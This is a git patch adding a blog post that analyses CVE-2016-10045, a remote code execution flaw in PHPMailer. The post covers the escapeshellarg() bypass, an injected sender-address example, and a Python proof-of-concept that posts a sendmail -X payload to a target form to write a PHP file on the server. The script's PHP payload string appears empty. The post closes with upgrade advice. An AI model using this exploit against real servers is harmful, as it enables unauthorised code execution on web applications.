From a9847bb9379a3feb79a94fdcdd880d3c09857a81 Mon Sep 17 00:00:00 2001 From: priv <140729444+scriptprivate@users.noreply.github.com> Date: Thu, 7 Nov 2024 08:36:34 -0300 Subject: [PATCH] feat(blog): add English version of CVE-2016-10045 post --- _posts/2024-11-07-CVE-10045.markdown | 101 +++++++++++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 _posts/2024-11-07-CVE-10045.markdown diff --git a/_posts/2024-11-07-CVE-10045.markdown b/_posts/2024-11-07-CVE-10045.markdown new file mode 100644 index 000000000..0dce68840 --- /dev/null +++ b/_posts/2024-11-07-CVE-10045.markdown @@ -0,0 +1,101 @@ +--- +layout: post +title: "Analysis of CVE-2016-10045: RCE in PHPMailer" +date: 2024-11-07 +--- + +[CVE-2016-10045](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045)\[1\] is a critical vulnerability in [PHPMailer](https://github.com/PHPMailer/PHPMailer)\[2\], a widely used library for sending emails in [PHP](https://www.php.net/)\[3\] web applications, affecting versions prior to 5.2.18. This vulnerability allows attackers to execute malicious code on a compromised web server by exploiting an input validation flaw in the PHPMailer code. + +This publication is also available in: [Portuguese](https://blog.lesis.lat/blog/CVE-2016-10045/) + +--- + +**Intro** + +PHPMailer remains one of the most widely used email-sending libraries, with approximately 9 million users worldwide. Additionally, it is also used in numerous open-source projects such as WordPress, Drupal, and Joomla. + +This vulnerability is particularly critical because, in most cases, the attacker does not need to be an authenticated user to inject malicious code and perform a [remote code execution (RCE)](https://www.cloudflare.com/en-gb/learning/security/what-is-remote-code-execution/)\[4\] on a web server. + +To exploit this vulnerability, an attacker simply needs to identify a form field that uses PHPMailer for email sending and submit the payload. + +--- + +**Description** + +This vulnerability stems from an inadequate fix for [CVE-2016-10033](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033)\[5\]. In PHPMailer version 5.2.17, the *$Sender* variable is sanitized using the *escapeshellarg()* function before being passed to the *mail()* function. However, an attacker can add an extra single quotation mark that isn’t properly escaped, breaking the intended flow of *escapeshellarg()*. + +Example: + +```php +$mail \-\> SetFrom("\\"Attacker\\\\' \-Param2 \-Param3\\"@test.com", 'Client Name'); +``` + +The above will result in the following list of arguments being passed to the email-sending application: + +``` +Arg no. 0 \== \[/usr/sbin/sendmail\] +Arg no. 1 \== \[-t\] +Arg no. 2 \== \[-i\] +Arg no. 3 \== \[-f\\"Attacker\\\\\\\] +Arg no. 4 \== \[-Param2\] +Arg no. 5 \== \[-Param3"@test.com'\] +``` + +The attacker can pass the **\-X** parameter to create a log containing arbitrary PHP code, making versions prior to **5.2.20** vulnerable to remote code execution (RCE). + +--- + +**Proof of Concept** + +Python script to exploit the vulnerability: + +```python +#!/usr/bin/env python3 +import requests +import argparse +import re +def exploit(url, dir): + if not re.match(r'^https?://', url): + url \= f"https://{url}" + payload \= "\\"attacker\\\\' \-oQ/tmp/ \-X%s/phpcode.php some\\"@email.com" % dir + code \= "\" + + data \= {'action': 'send', 'name': 'LESIS', 'email': payload, 'msg': code} + + response \= requests.post(url, data=data) + + if response.status\_code \== 200: + print("Exploitation successful\!") + else: + print("Exploitation failed.") +def main(): + parser \= argparse.ArgumentParser(description='CVE-2016-10045 | PHPMailer') + parser.add\_argument('-t', '--target', required=True, help='Target URL') + parser.add\_argument('-d', '--dir', required=True, help='Remote recording directory') + args \= parser.parse\_args() + + if args.target and args.dir: + exploit(args.target, args.dir) +if \_\_name\_\_ \== '\_\_main\_\_': + main() +``` + +--- + +**Conclusion** + +The vulnerability arises from a failure of improper input sanitization input in PHPMailer, allowing attackers to execute malicious code on compromised web servers. This poses a significant risk, as exploitation can be carried out without requiring authentication, allowing for remote code injection (RCE) in vulnerable applications. + +The potential impact of a successful exploitation includes the execution of arbitrary code, which potentially leads to security breaches and unauthorized access to sensitive information. + +The recommended mitigation is to update PHPMailer to version 5.2.20 or higher. + +--- + +**References** + +* \[1\] [MITRE \- CVE-2016-10045](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10045) +* \[2\] [GitHub \- PHPMailer: A full-featured email creation and transfer class for PHP](https://github.com/PHPMailer/PHPMailer) +* \[3\] [PHP \- A popular general-purpose scripting language](https://www.php.net) +* \[4\] [Cloudflare \- What is remote code execution?](https://www.cloudflare.com/en-gb/learning/security/what-is-remote-code-execution/) +* \[5\] [MITRE \- CVE-2016-10033](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10033)